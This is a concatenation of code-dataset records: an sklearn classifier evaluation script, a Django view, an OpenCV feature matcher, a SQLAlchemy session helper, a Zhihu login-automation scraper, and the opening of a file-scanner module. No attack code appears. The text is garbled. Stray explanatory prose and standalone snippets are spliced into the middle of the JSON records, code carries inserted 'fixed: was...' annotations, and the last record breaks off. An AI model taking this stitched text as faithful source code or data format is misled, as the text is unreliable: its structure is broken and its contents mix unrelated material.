OneHotEncoder(handle_unknown='ignore'))])\n\npreprocessor = ColumnTransformer(\n transformers=[\n ('num', numeric_transformer, numeric_features),\n ('cat', categorical_transformer, categorical_features)])\n\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import plot_precision_recall_curve\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import log_loss\nfrom sklearn.metrics import roc_auc_score, roc_curve, auc\nimport matplotlib.pyplot as plt\n\nclassifiers = [\n LogisticRegression()\n]\n\nclf = Pipeline(steps=[('preprocessor', preprocessor),\n ('clf', None)])\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.2, random_state=0)\n\nprint('Training Features Shape:', X_train.shape)\nprint('Training Labels Shape:', y_train.shape)\nprint('Testing Features Shape:', X_test.shape)\nprint('Testing Labels Shape:', y_test.shape)\n\nroc_things = []\nprecision_recall_things 
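get_attack_type_downsampled_balanced_subset above equalizes the two classes by sampling whichever side is larger down to the size of the smaller one. The same idea reduced to a few lines of pandas; the function name and the toy series are hypothetical:

import pandas as pd

def balance_binary(y):
    # y: boolean Series; sample each class down to the minority size
    pos, neg = y[y], y[~y]
    n = min(len(pos), len(neg))
    return pos.sample(n=n).index.union(neg.sample(n=n).index)

y = pd.Series([True] * 3 + [False] * 10)
print(len(balance_binary(y)))  # 6: three True rows plus three sampled False rows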
= []\n\nfor classifier in classifiers:\n clf.set_params(clf=classifier).fit(X_train, y_train)\n classifier_name = classifier.__class__.__name__\n print(str(classifier))\n print(\"model score: %.3f\" % clf.score(X_test, y_test))\n\n y_score = clf.predict_proba(X_test)[:,1]\n\n y_pred = clf.predict(X_test)\n \n roc_auc = roc_auc_score(y_test, y_score)\n fpr, tpr, _ = roc_curve(y_test, y_score)\n roc_things.append((fpr, tpr, '{} AUC: {:.3f}'.format(classifier_name, roc_auc)))\n \n precision, recall, thresholds = precision_recall_curve(y_test, y_score)\n pr_auc = auc(recall, precision)\n precision_recall_things.append((recall, precision, thresholds, '{} AUC: {:.3f}'.format(classifier_name, pr_auc)))\n #plot_precision_recall_curve(clf, X_test, y_test)\n \n print(confusion_matrix(y_test, y_pred))\n print(classification_report(y_test, y_pred))\n\n print('average precision score: {:.3f}'.format(average_precision_score(y_test, y_score)))\n print('roc_auc_score: {:.3f}'.format(roc_auc))\n print('precision-recall AUC: {:.3f}'.format(pr_auc))\n print()\n\nroc_plt = plt.figure()\nlw = 4\nfor roc_thing in roc_things:\n fpr, tpr, label = roc_thing\n plt.plot(fpr, tpr, lw=lw, label=label)\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.legend()\nplt.title('ROC curve')\n\npr_plt = plt.figure()\nfor pr_thing in precision_recall_things:\n recall, precision, _, label = pr_thing\n plt.plot(recall, precision, lw=lw, label=label)\nratio = y_test[y_test].shape[0] / y_test.shape[0]\nplt.hlines(y=ratio, xmin=0, xmax=1, color='navy', lw=lw, linestyle='--')\nplt.title('Precision-recall plot')\nplt.legend()\n\nwith open('{}.pkl'.format(classifier_name), 'wb') as f:\n pickle.dump(clf, f)", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 7021, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.DataFrame", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_openml", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 85, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 119, "usage_type": "attribute"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.compose.ColumnTransformer", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 174, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 175, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_curve", "line_number": 178, "usage_type": 
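The evaluation loop above derives ROC AUC directly from the positive-class scores and precision-recall AUC by integrating the PR curve with auc(recall, precision). The same two computations in isolation, on toy labels and scores:

from sklearn.metrics import roc_auc_score, precision_recall_curve, auc

y_true = [0, 0, 1, 1]
y_score = [0.1, 0.4, 0.35, 0.8]

print(roc_auc_score(y_true, y_score))        # ROC AUC, 0.75 for this toy data
precision, recall, _ = precision_recall_curve(y_true, y_score)
print(auc(recall, precision))                # precision-recall AUC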
"call"}, {"api_name": "sklearn.metrics.auc", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 183, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 184, "usage_type": "call"}, {"api_name": "sklearn.metrics.average_precision_score", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 210, "usage_type": "call"}]} +{"seq_id": "238273921", "text": "from django.shortcuts import render\n\nfrom about.forms import CommentForm\nfrom about.models import Comment\nfrom map.forms import MarkForm\nfrom map.models import MapMarks\nfrom django.http import JsonResponse\n\ndef Map(request):\n if request.method == \"GET\":\n if request.is_ajax():\n if request.GET[\"type\"] == '1':\n mark = MapMarks.objects.filter(id = request.GET[\"id\"]).values()\n return JsonResponse(mark.first())\n else:\n comment = Comment.objects.filter(id = request.GET[\"id\"]).values()\n return JsonResponse(comment.first())\n else:\n marks = MapMarks.objects.all().values('id', 'position_x', 'position_y')\n form_comment = CommentForm()\n form_mark = MarkForm()\n return render(request, 'adding-mark/adding-mark.html', {\"marks\": marks, \"form_comment\": form_comment, \"form_mark\": form_mark})\n else:\n if (request.POST[\"type\"] == 1):\n data = CommentForm(request.POST)\n else:\n data = MarkForm(request.POST, request.FILES)\n\n if (data.data[\"type\"] == '1'):\n comment = Comment()\n comment.comment = data.data[\"comment\"]\n comment.username = data.data[\"username\"]\n comment.id_mark = data.data[\"id_mark\"]\n mark = MapMarks.objects.get(id = data.data[\"id_mark\"])\n comment.save()\n mark.id_comment = mark.id_comment + str(comment.id) + '_'\n mark.save()\n else:\n mark = MapMarks()\n mark.comment = data.data[\"comment\"]\n mark.name = data.data[\"name\"]\n mark.image = data.files[\"image\"]\n mark.position_y = 
float(data.data[\"position_y\"])\n mark.position_x = float(data.data[\"position_x\"])\n mark.save()\n form = CommentForm()\n form_mark = MarkForm()\n marks = MapMarks.objects.all().values('id', 'position_x', 'position_y')\n return render(request, 'adding-mark/adding-mark.html', {\"marks\": marks, \"form\": form, \"form_mark\": form_mark})", "sub_path": "map/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "map.models.MapMarks.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 13, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 14, "usage_type": "call"}, {"api_name": "about.models.Comment.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "about.models.Comment.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "about.models.Comment", "line_number": 16, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 17, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 19, "usage_type": "name"}, {"api_name": "about.forms.CommentForm", "line_number": 20, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 21, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "about.forms.CommentForm", "line_number": 25, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 27, "usage_type": "call"}, {"api_name": "about.models.Comment", "line_number": 30, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.get", "line_number": 34, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 34, "usage_type": "name"}, {"api_name": "map.models.MapMarks", "line_number": 39, "usage_type": "call"}, {"api_name": "about.forms.CommentForm", "line_number": 46, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 47, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "644688010", "text": "import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nimport matcher\nfig = plt.figure()\n\ndef camera_capture():\n cap = cv2.VideoCapture(0)\n\n while True:\n ret, frame = cap.read()\n \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n fig.add_subplot(1, 2, 1)\n cv2.imshow('bgr', frame)\n fig.add_subplot(1, 2, 2)\n cv2.imshow('gray', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n\ndef normalized(img):\n # half-sampling\n img = cv2.resize(img, (0, 0), fx = 0.5, fy = 0.5)\n # filter\n kernel_size = 2\n kernel = np.ones((kernel_size, kernel_size), np.float32) / (kernel_size ** 2)\n img = cv2.filter2D(img, -1, kernel)\n return img\n\ndef 
fast_matching():\n fast = cv2.FastFeatureDetector_create(type = cv2.FastFeatureDetector_TYPE_7_12, nonmaxSuppression = True)\n img_src = cv2.imread('./resource/P_20180407_120033.jpg', 0);\n img_dst = cv2.imread('./resource/P_20180407_120034.jpg', 0);\n\n # normalize\n img_src = normalized(img_src)\n img_dst = normalized(img_dst)\n \n # get keypoints\n kp_src = fast.detect(img_src, None)\n kp_dst = fast.detect(img_dst, None)\n\n # matching\n matchX, matchY, cost_mat = matcher.stable_SSD(img_src, kp_src, img_dst, kp_dst, max_dist = 25)\n dmatch = [cv2.DMatch(i, matchX[i], cost_mat[i][matchX[i]]) for i in range(len(kp_src)) if matchX[i] < len(kp_dst)]\n dmatch.sort(key = lambda x: x.distance)\n \n # draw matches\n img_res = cv2.drawMatches(img_src, kp_src, img_dst, kp_dst, dmatch[:int(0.2 * len(dmatch))], outImg = None, flags = 2)\n \n# fig.add_subplot(1, 2, 1)\n# plt.imshow(img_src)\n# fig.add_subplot(1, 2, 2)\n# plt.imshow(img_dst)\n plt.imshow(img_res)\n\n mng = plt.get_current_fig_manager()\n mng.resize(*mng.window.maxsize())\n\nfast_matching()\nplt.show()\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1920, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "cv2.VideoCapture", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.filter2D", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.FastFeatureDetector_create", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.FastFeatureDetector_TYPE_7_12", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "matcher.stable_SSD", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.DMatch", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.drawMatches", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.get_current_fig_manager", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}]} +{"seq_id": "514508946", "text": "import time\n\nfrom oslo_log import log as logging\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.event import listen\nfrom sqlalchemy.exc import DisconnectionError, OperationalError\nfrom sqlalchemy.orm import sessionmaker\n\nfrom conch import cfg\n\nconf = 
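fast_matching above detects FAST keypoints in both images and pairs them with the repository's own matcher.stable_SSD. The detection step alone, run on a synthetic image so the snippet stays self-contained (the filled rectangle merely gives FAST some corners to find):

import numpy as np
import cv2

img = np.zeros((100, 100), dtype=np.uint8)
cv2.rectangle(img, (30, 30), (70, 70), 255, -1)  # high-contrast corners

fast = cv2.FastFeatureDetector_create(type=cv2.FastFeatureDetector_TYPE_7_12,
                                      nonmaxSuppression=True)
keypoints = fast.detect(img, None)
print(len(keypoints), "keypoints detected")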
cfg.CONF.database\nLOG = logging.getLogger(__name__)\n\n_ENGINE = None\n_MAKER = None\n\n\ndef get_session(autocommit=True, expire_on_commit=False):\n global _MAKER\n\n if _MAKER is None:\n engine = get_engine()\n _MAKER = get_maker(engine, autocommit, expire_on_commit)\n\n session = _MAKER()\n return session\n\n\ndef ping_listener(dbapi_conn, connection_rec, connection_proxy):\n try:\n dbapi_conn.cursor().execute('select 1')\n except dbapi_conn.OperationalError as ex:\n if ex.args[0] in (2006, 2013, 2014, 2045, 2055):\n LOG.warn('Got mysql server has gone away: %s', ex)\n raise DisconnectionError(\"Database server went away\")\n else:\n raise\n\n\ndef is_db_connection_error(args):\n conn_err_codes = ('2002', '2003', '2006')\n for err_code in conn_err_codes:\n if args.find(err_code) != -1:\n return True\n return False\n\n\ndef get_engine():\n global _ENGINE\n if _ENGINE is None:\n\n engine_args = {\n \"pool_recycle\": conf.sql_idle_timeout,\n \"echo\": False,\n 'convert_unicode': True,\n \"pool_size\": conf.sql_pool_size,\n \"max_overflow\": conf.sql_max_overflow,\n }\n\n if conf.sql_connection_debug >= 100:\n engine_args['echo'] = 'debug'\n elif conf.sql_connection_debug >= 50:\n engine_args['echo'] = True\n\n _ENGINE = create_engine(conf.sql_connection, **engine_args)\n\n listen(_ENGINE, 'checkout', ping_listener)\n\n try:\n _ENGINE.connect()\n except OperationalError as e:\n if not is_db_connection_error(e.args[0]):\n raise\n\n remaining = conf.sql_max_retries\n if remaining == -1:\n remaining = 'infinite'\n while True:\n msg = ('SQL connection failed. %s attempts left.')\n LOG.warn(msg % remaining)\n if remaining != 'infinite':\n remaining -= 1\n time.sleep(conf.sql_retry_interval)\n try:\n _ENGINE.connect()\n break\n except OperationalError as e:\n if (remaining != 'infinite' and remaining == 0) or \\\n not is_db_connection_error(e.args[0]):\n raise\n return _ENGINE\n\n\ndef get_maker(engine, autocommit=True, expire_on_commit=False):\n return sessionmaker(bind=engine,\n autocommit=autocommit,\n expire_on_commit=expire_on_commit)\n", "sub_path": "conch/db/sqlalchemy/session.py", "file_name": "session.py", "file_ext": "py", "file_size_in_byte": 2830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "conch.cfg.CONF", "line_number": 11, "usage_type": "attribute"}, {"api_name": "conch.cfg", "line_number": 11, "usage_type": "name"}, {"api_name": "oslo_log.log.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "oslo_log.log", "line_number": 12, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.DisconnectionError", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlalchemy.event.listen", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 71, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 87, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "484197808", "text": "# coding: utf-8\n\nfrom http import cookiejar\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport requests\nimport time\nimport re\nimport json\nimport base64\nimport hmac\nimport hashlib\n\n\nHEADERS = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Encoding\": 
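The ping_listener in this record issues 'select 1' on every pool checkout to catch stale MySQL connections. Modern SQLAlchemy exposes the same liveness check as a pool option; a sketch, with an in-memory SQLite URL standing in for the real sql_connection setting:

from sqlalchemy import create_engine, text

# pool_pre_ping (SQLAlchemy >= 1.2) performs on checkout the liveness check
# that the manual 'select 1' listener above implements by hand.
engine = create_engine("sqlite://", pool_recycle=3600, pool_pre_ping=True)
with engine.connect() as conn:
    print(conn.execute(text("select 1")).scalar())  # -> 1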
\"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\n \"Connection\": \"keep-alive\",\n \"Host\": \"www.zhihu.com\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\",\n}\n\nLOGIN_URL = 'https://www.zhihu.com/signup'\nLOGIN_API = 'https://www.zhihu.com/api/v3/oauth/sign_in'\n\nFORM_DATA = {\n\n \"client_id\": \"c3cef7c66a1843f8b3a9e6a1e3160e20\",\n \"grant_type\": \"password\",\n \"source\": \"com.zhihu.web\",\n \"username\": '',\n \"password\": '',\n \"lang\": \"cn\",\n \"ref_source\": \"homepage\",\n}\n\n\nclass ZHIHULogin(object):\n \n def __init__(self):\n\n self.login_url = LOGIN_URL\n self.login_api = LOGIN_API\n self.login_data = FORM_DATA\n self.session = requests.session()\n self.headers = HEADERS.copy()\n self.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')\n \n\n def login(self, load_cookies=True):\n \n \"\"\"\n 模拟登录知乎\n :param load_cookies: 是否读取上次保存的 Cookies\n :return: bool\n \"\"\"\n if load_cookies and self.load_cookies():\n if self.check_login():\n print('已读取 Cookies 并登录成功')\n return True\n else:\n print('保存的 Cookies 已过期,将重新登录')\n\n\n headers = self.headers.copy()\n xsrf, udid = self._get_token_udid()\n print(self.session.cookies.get_dict())\n headers.update({\n \"x-udid\": udid,\n \"x-xsrftoken\": xsrf,\n 'authorization': 'oauth c3cef7c66a1843f8b3a9e6a1e3160e20',\n })\n headers.update({'origin': 'https://www.zhihu.com','Referer': 'https://www.zhihu.com/signup','Accept': 'application/json, text/plain, */*'})\n self.login_data.update({\n 'username': self._input_data('username', '登录手机'),\n 'password': self._input_data('password', '密码')\n })\n timestamp = str(int(time.time()*1000))\n self.login_data.update({\n \"timestamp\": timestamp,\n \"signature\": self._get_signature(timestamp),\n \"captcha\": self._get_captcha(headers.copy()),\n })\n\n res = self.session.post(self.login_api, data=self.login_data, headers=headers)\n print(self.session.cookies.get_dict())\n print(res.text,res.status_code)\n if '验证码' in res.text:\n print('验证码错误')\n elif self.check_login():\n print('登录成功')\n return True\n print('登录失败')\n return False\n\n\n def load_cookies(self):\n \n \"\"\"\n 读取 Cookies 文件加载到 Session\n :retur\n \"\"\"\n try:\n self.cookies.load(ignore_discard=True)\n except FileNotFoundError:\n print('Cookies.txt 未找到,读取失败')\n else:\n #工具方法转换成字典\n load_cookies = requests.utils.dict_from_cookiejar(self.cookies)\n #工具方法将字典转换成RequestsCookieJar,赋值给session的cookies.\n self.session.cookies = requests.utils.cookiejar_from_dict(load_cookies)\n return True\n return False \n\n def check_login(self):\n \"\"\"\n 检查登录状态,访问登录页面出现跳转则是已登录,\n 如登录成功保存当前 Cookies\n :return: bool\n \"\"\"\n res = self.session.get(self.login_url, headers=self.headers, allow_redirects=False)\n print(res.status_code)\n if res.status_code == 302:\n # self.session.cookies.save()\n #将转换成字典格式的RequestsCookieJar(这里我用字典推导手动转的)保存到LWPcookiejar中\n requests.utils.cookiejar_from_dict({c.name: c.value for c in self.session.cookies}, self.cookies)\n self.cookies.save(ignore_discard=True, ignore_expires=True)\n return True\n return False\n\n def _get_token_udid(self):\n \"\"\"\n 从登录页面获取 token\n :return:\n \"\"\"\n cookies_dict = {}\n token = udid = None\n res = self.session.get(self.login_url,headers=self.headers) \n print(\"请求第一步:状态吗为: %s\" % res.status_code)\n if res.status_code == 200:\n # cookies_dict = requests.utils.dict_from_cookiejar(self.session.cookies)\n cookies_dict = 
self.session.cookies.get_dict()\n\n        if cookies_dict['_xsrf']:\n            token = cookies_dict.get('_xsrf')\n        if cookies_dict['d_c0']:\n            udid = cookies_dict.get('d_c0').split(\"|\")[0].replace(\"\\\"\",\"\")\n        print(\"token is %s and udid is %s\" % (token, udid))\n        return token, udid\n\n\n    def _get_captcha(self, headers, lang='cn'):\n        \"\"\"\n        Call the captcha API endpoint; it must be requested once whether or not a captcha is needed.\n        If a captcha is required, the response carries the image as base64.\n        Two captcha variants exist and both need manual input.\n        :param headers: request headers carrying the authorization info\n        :param lang: captcha variant; 'cn' means clicking upside-down Chinese characters, 'en' means typing characters\n        :return: the captcha POST parameter\n        \"\"\"\n\n        if lang == 'cn':\n            api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=cn'\n        else:\n            api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=en'\n\n        if headers.get('x-xsrftoken'):\n            headers.pop('x-xsrftoken')\n        res = self.session.get(api, headers=headers)\n        print(\"Step two request: status code: %s\" % res.status_code)\n        show_captcha = re.search(r'true', res.text)\n        if show_captcha:\n            put_res = self.session.put(api, headers=headers)\n            content = base64.b64decode(json.loads(put_res.text)['img_base64'])  # fixed: was josn.loads(put_res); the response body must be read via .text\n            with open('./captcha.png', 'wb') as f:\n                f.write(content)\n            img = Image.open('./captcha.png')  # fixed: was bound to 'image' while the code below uses 'img'\n            if lang == 'cn':\n                plt.imshow(img)\n                print('Click every upside-down character, then press Enter to submit')\n                points = plt.ginput(7)\n                capt = json.dumps({'img_size': [200, 44],'input_points': [[i[0]/2, i[1]/2] for i in points]})\n            else:\n                img.show()\n                capt = input('Type the characters shown in the image: ')\n\n            # the parameter must first be POSTed to the captcha endpoint\n            self.session.post(api, data={'input_text': capt}, headers=headers)\n            return capt\n        else:\n            print(\"No captcha required\")\n            return ''\n\n\n    def _get_signature(self, timestamp):\n        \"\"\"\n        Compute and return the signature via HMAC\n        It is really just a few fixed strings plus the timestamp\n        :param timestamp: timestamp\n        :return: signature\n        https://static.zhihu.com/heifetz/main.app.268c34bc2abd4304ea97.js\n        \"\"\"\n        ha = hmac.new(b'd1b964811afb40118a12068ff74a12f4', digestmod=hashlib.sha1)\n        grant_type = self.login_data['grant_type']\n        client_id = self.login_data['client_id']\n        source = self.login_data['source']\n        # the order must not change\n        ha.update(bytes((grant_type + client_id + source + timestamp), 'utf-8'))\n        signature = ha.hexdigest()\n        print('Signature string: %s' % signature)\n        return signature\n\n    def _input_data(self, key, data_name):\n        \"\"\"\n        Prompt for a form_data parameter that was not preset\n        :param key: key name\n        :param data_name: human-readable name used in the prompt\n        :return: the entered value\n        \"\"\"\n        value = self.login_data.get(key)\n        if not value:\n            value = input('Please enter {}: '.format(data_name))\n        return value\n\n\nif __name__ == '__main__':\n    account = ZHIHULogin()\n    account.login()\n    # after a successful login, request the page below as a test\n    # keeping only the headers shown below works; otherwise the response text comes back garbled\n    # h: {'Host': 'zhuanlan.zhihu.com', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0', 'Referer': 'https://www.zhihu.com/'}\n    # res = s.get('https://zhuanlan.zhihu.com/p/35986817',headers=h)\n", "sub_path": "zhihu/login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 8474, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.session", "line_number": 47, "usage_type": "call"}, {"api_name": "http.cookiejar.LWPCookieJar", "line_number": 49, "usage_type": "call"}, {"api_name": "http.cookiejar", "line_number": 49, "usage_type": "name"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "requests.utils.dict_from_cookiejar", "line_number": 111, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 111, "usage_type": "attribute"}, {"api_name": "requests.utils.cookiejar_from_dict", "line_number": 113, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 113, "usage_type": "attribute"}, {"api_name": 
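_get_signature above HMAC-signs the concatenation of grant_type, client_id, source, and the timestamp with SHA-1. The same computation as a free function; the key and field values are copied from the record, the function name is not:

import hashlib
import hmac
import time

def sign(grant_type, client_id, source, timestamp,
         key=b'd1b964811afb40118a12068ff74a12f4'):
    # HMAC-SHA1 over the fields concatenated in this fixed order
    ha = hmac.new(key, digestmod=hashlib.sha1)
    ha.update((grant_type + client_id + source + timestamp).encode('utf-8'))
    return ha.hexdigest()

print(sign('password', 'c3cef7c66a1843f8b3a9e6a1e3160e20',
           'com.zhihu.web', str(int(time.time() * 1000))))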
"requests.utils.cookiejar_from_dict", "line_number": 128, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 128, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 173, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 176, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 179, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ginput", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 184, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 205, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 205, "usage_type": "attribute"}]} +{"seq_id": "194213413", "text": "#File Scanner\r\n#Made by Jack Carmichael\r\n\"\"\"\r\n===================================================================================\r\nObject--------------------Parameters--------------------Inheritance\r\n -AppWindow() -void -object\r\n -FileInfo() -frame -object\r\n -CurrentFileInfo() -frame -object\r\n -AcanGui() -file_listboxes,progress_bar -object\r\n -ProgressBar() -frame,length,height -TkinterWrapper.WindowCanvas\r\n -Scan() -directory,scan_gui -object\r\n -FIleType() -file_extension,file_consensus -object\r\n -FileTypeEditor() -parrent_window,edit_type -object\r\n -SetDirWindow() -parent_window -object\r\n -DirectoryListbox() -frame,companion_text_entry 